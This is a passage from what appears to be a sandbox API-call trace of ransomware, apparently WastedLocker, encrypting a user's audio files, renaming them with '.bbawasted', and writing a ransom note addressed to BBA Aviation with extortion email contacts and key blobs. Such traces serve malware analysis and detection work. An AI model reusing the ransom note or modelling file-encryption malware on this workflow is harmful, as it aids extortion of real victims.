(in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.504] lstrcpyW (in: lpString1=0x6c4c3a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.504] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\6cps4Q.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\6cps4q.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\6cps4Q.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\6cps4q.wav.bbawasted")) returned 1 [0220.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\6cps4Q.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\6cps4q.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0220.506] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0220.506] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x4deb [0220.506] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4deb) returned 0x5f0000 [0220.507] CloseHandle (hObject=0x27c) returned 1 [0220.508] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.508] CloseHandle (hObject=0x290) returned 1 [0220.508] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.508] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6350) returned 1 [0220.509] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.509] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0220.509] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6818) returned 1 [0220.510] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0220.510] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0220.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0220.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0220.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.522] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FUjCMwYqVefDfTw7axkBGQ4vxmJGZSInQSATdCYEhWMQkLmKCZ77OZMdUXiXwdOw\r\nmWs50ezTEfHqPgPkppmC65Rp6tkRyr8xVF8MRK3m7z3GcGMWGCcN63FZOmRSjStu\r\nWe+5AogiD6vqyWbNL+7b83j9kWR0rnrSz0O2kS31/wDmwWK04NNS5Mw1PmRiGYGM\r\neTLsEHLn/rfBP+6eloauLUs4pn7BPVgYJnt2G5XtqRgvG2dq1MX29r7b0LIALrpi\r\na2o4CeAQqWKJ2+K1j7jNpDLtYnWJ+dk/WCN5Cl1fRivANuCYZQvxSAI1pUI7FaIg\r\nL5nmBX4snNbk3zPj2K2teGzV16OlF+jLdKFm0M/VpWMwswlJD5Vzo8e3qhIL65J3\r\n7dxmE8gUd8KqsGTp7mohtoPAQ9CDT91kx6Rd0pC/MowMbA1d06uqa2l5P7G6k6UY\r\nUom/23TfzMgHDSXQ5T+utqcjADxSAXs8SDjru+s5bfmLo/fkdBnM0HyPG2UHlP0R\r\neT8X70iRulGX8hMnF1duMy1bjs9LQM6p0Uea1rzFkjbLRO1UD08BDMenOG3Bq+XK\r\n1yKdFQLaIx/HApY2ItOTBwByUBgG+pgKL5vZB55WDnE3nMraRGVJxeFaMgnWR503\r\n5bcz9K8wcPK3STv1YJPn1Vhye94BlfI2MqtcHWIoMQ8=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0220.522] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0220.522] SetEndOfFile (hFile=0x280) returned 1 [0220.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.525] CloseHandle (hObject=0x280) returned 1 [0220.525] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0220.526] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x660000) returned 1 [0220.526] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a5f10) returned 1 [0220.527] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0220.527] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0220.527] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\Ac8b4chFRDdeF.m4a") returned 113 [0220.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ec) returned 0x6c4b88 [0220.527] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.527] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0220.528] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0220.528] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0220.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\Ac8b4chFRDdeF.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\ac8b4chfrddef.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0220.552] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.554] SetEndOfFile (hFile=0x290) returned 1 [0220.554] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.554] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.554] lstrcpyW (in: lpString1=0x6c4c6a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\Ac8b4chFRDdeF.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\ac8b4chfrddef.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\Ac8b4chFRDdeF.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\ac8b4chfrddef.m4a.bbawasted")) returned 1 [0220.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\Ac8b4chFRDdeF.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\ac8b4chfrddef.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0220.556] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0220.556] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x9660 [0220.556] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9660) returned 0x5f0000 [0220.556] CloseHandle (hObject=0x280) returned 1 [0220.558] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.559] CloseHandle (hObject=0x27c) returned 1 [0220.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.559] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6ce0) returned 1 [0220.560] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.560] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0220.560] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0221.000] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0221.001] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0221.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0221.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.013] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]aQF8iq+zsx+Pi16gs/FWHBDXtC2niMEq0zixDSEjCVyeDdQIujFn4ruMPnC105ew\r\ntV3D5TCNutRrIx4yB+tfUbkDZnqJrsmn62CEfHiUvEG6bcv4P0LCHLslj1hJ+Yf3\r\nbUFA3LC3k0eKlTczJKaOT8dSPJtUijEgkNAbwrkOFuzURDpbkRWKDasDyIqd5raV\r\nlb7aDbPcDliG/TE44/LDyNukITLXq2wN6Ym3ukz9zyfuHxgGi2OYag/NfHPrhkQ5\r\nz4o/S6ClxRcMODj0uLGobPtIAKtJGDL19y/d31DRNQWlNB+Ccbo/GDgAC75Rxx1J\r\n0dpGd0CmOBaQkgEqKgqTq9wwNTH32vXPBRNcg451FCUgsr0D1j36q45a5MH5pMMp\r\naSRiT1h/hSixc3CHjP7gDn7e9ae7AsS8OXGMIUMt3PYzmm8jnRRjrjaE6SZO5N8I\r\nZ/moNZv495R3BESvOMJSNBXcEl1Dj0dhHW8quCDi6Cu+vf5eomJyoiLYN3D/C1d9\r\n15ZvDnR/ElquwcHtdLs7k0g88BsCGyNke22TRBMDr7kUbLTRNE7D03scCocYGgup\r\nDAVx1cBBrzhvVJ9oS35GH/IKPZqx2t95D8vp5Tl/8M7C9HKUcRVb6DBVy6Wg1zGr\r\nZtqvscHHxLLCv9M3/KxkTVT/oDRLXQvzUm5kPT4ecjs=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.013] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0221.014] SetEndOfFile (hFile=0x290) returned 1 [0221.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.017] CloseHandle (hObject=0x290) returned 1 [0221.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0221.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc950 | out: hHeap=0x660000) returned 1 [0221.018] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a65f8) returned 1 [0221.018] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0221.018] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0221.019] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\jbQDbFhf.mp3") returned 136 [0221.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x31a) returned 0x6c4b88 [0221.019] lstrcpyW (in: lpString1=0x6c4c98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.019] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6708) returned 1 [0221.019] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.020] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0221.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\jbQDbFhf.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\jbqdbfhf.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0221.024] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.025] SetEndOfFile (hFile=0x290) returned 1 [0221.025] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.025] lstrcpyW (in: lpString1=0x6c4c98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\jbQDbFhf.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\jbqdbfhf.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\jbQDbFhf.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\jbqdbfhf.mp3.bbawasted")) returned 1 [0221.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\jbQDbFhf.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\jbqdbfhf.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0221.027] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0221.028] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x7327 [0221.028] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7327) returned 0x5f0000 [0221.028] CloseHandle (hObject=0x27c) returned 1 [0221.030] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0221.030] CloseHandle (hObject=0x280) returned 1 [0221.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0221.031] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0221.031] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0221.031] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0221.032] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a69b0) returned 1 [0221.032] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0221.032] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0221.044] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.044] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0221.044] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.044] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oq6UHV+KTeL3g+Kfy5uEKEnM5lRsfqWhmlVr/8Bmcm75+3QgtCm+3LlsvoR/OURG\r\nJzk45xd8CsapU1b7Fz4mMjFUoFLXS/PDtHI3/Yb5EDbXdO/MKl/tyE1SA4Pb5HSs\r\nXcMHr5Z3CE4DPvicAWE6vCL+beQ4JIzAyravC5eBFHnIfRWGo0+E5Z8/KF377Gcz\r\nWLsjaXXiWvl0K218aO1y5fGKj0tC+0/3XNJ2e49ebjdEiXBY9LJM2R2P8UGB/Xvs\r\nTzs5znvaBr3ZRuCVCbn08QakSYcptglZGVM8tzvdtqay1p/an2AI0syMGBOt/rpq\r\n+Kv19lgnG1xHYF20XBZdmqPJkBN7/y1LyMRdPXtjov/5eQh7vyBxkfjkdXDGU0Cm\r\nlqqBD43AXJt37xh6pbG0nmyP8F8YGrfKFwTceb9d+t0v//og4u4AFj4nZKwYNfcu\r\nrK+6hk7FF65dd+zc/9vjKT8uCygg3xjvPHyA3no2eRyL1uv55KCwA9IZeyHrvOWG\r\nTELFoRKw2BaB569kSmL3ZJAbRFngV8SS1ISTTFodO87kQC8pARFJDQ9thRBsT9Or\r\niSHFNDijQ10phSzWUXsDOD8DijOmVGxeMdsJirw0tFOf82vkdy7RGZFIjgnxMroj\r\n7T/rqM3ntGsJFl0EHPhJMRst2YAhlHn+uDp1nVvdt/P=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.045] WriteFile (in: hFile=0x290, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0221.268] SetEndOfFile (hFile=0x290) returned 1 [0221.271] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.271] CloseHandle (hObject=0x290) returned 1 [0221.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0221.272] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c00b0 | out: hHeap=0x660000) returned 1 [0221.272] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0221.273] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0221.273] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0221.273] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\a e5L-4Dd_.wav") returned 148 [0221.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x332) returned 0x6c4b88 [0221.273] lstrcpyW (in: lpString1=0x6c4cb0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.274] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0221.274] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.274] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0221.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\a e5L-4Dd_.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 